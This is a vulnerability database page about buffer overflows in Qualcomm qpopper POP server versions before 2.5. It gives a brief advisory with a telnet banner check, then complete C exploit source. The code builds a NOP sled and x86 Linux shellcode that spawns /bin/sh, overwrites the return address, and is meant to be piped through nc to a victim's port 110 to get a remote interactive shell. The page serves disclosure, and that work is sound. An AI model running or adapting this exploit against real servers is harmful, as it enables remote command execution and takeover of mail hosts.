Lucene search
K

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerability (1)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 15 Views

Qualcomm qpopper 2.4 POP Server Buffer Overflow Vulnerabilit

Code

                                                source: http://www.securityfocus.com/bid/133/info

A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version. 

To determine if you are vulnerable, telnet to port 110 on the possibly vulnerable host. A banner appears, informing you of the version of the pop server. For example: 

% telnet yourmailhost.your.domain.com 110 
Trying 123.123.123.123 
Connected to mailhost 
+OK QPOP (version 2.4) at yourmailhost.your.domain.com starting 

If any version prior to 2.5 is reported, including 2.5 beta, you should upgrade immediately to the latest version.

/* Exploit for qpopper 2.4 (and others) for Linux
 *   by [WaR] ([email protected]) and zav ([email protected])
 *
 *  usage: (./qpopper <offset>;cat)|nc <victim> 110
 *       with offset around 1000 (try increments of 50)
 *
 *
 *    shout outs to: Zef and YZF
 */

#include <stdio.h>
#include <stdlib.h>

#define BUFFSIZE 998

char shell[] =
   "\xeb\x33\x5e\x89\x76\x08\x31\xc0"
   "\x88\x66\x07\x83\xee\x02\x31\xdb"
   "\x89\x5e\x0e\x83\xc6\x02\xb0\x1b"
   "\x24\x0f\x8d\x5e\x08\x89\xd9\x83"
   "\xee\x02\x8d\x5e\x0e\x89\xda\x83"
   "\xc6\x02\x89\xf3\xcd\x80\x31\xdb"
   "\x89\xd8\x40\xcd\x80\xe8\xc8\xff"
   "\xff\xff/bin/sh";

unsigned long esp()
{
  __asm__(" movl %esp,%eax ");
}

main(int argc, char **argv)
{
  int i,j,offset;
  unsigned long eip;
  char buffer[4096];

  j=0;
  offset=atoi(argv[1]);
  eip=esp()+offset;
  for(i=0;i<1008;i++) buffer[i]=0x90;
  for(i=(BUFFSIZE - strlen(shell));i<BUFFSIZE;i++) buffer[i]=shell[j++];

  i=1005;
  buffer[i]=eip & 0xff;
  buffer[i+1]=(eip >> 8) & 0xff;
  buffer[i+2]=(eip >> 16) & 0xff;
  buffer[i+3]=(eip >> 24) & 0xff;

  printf("%s\nsh -i\n",buffer);
}
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation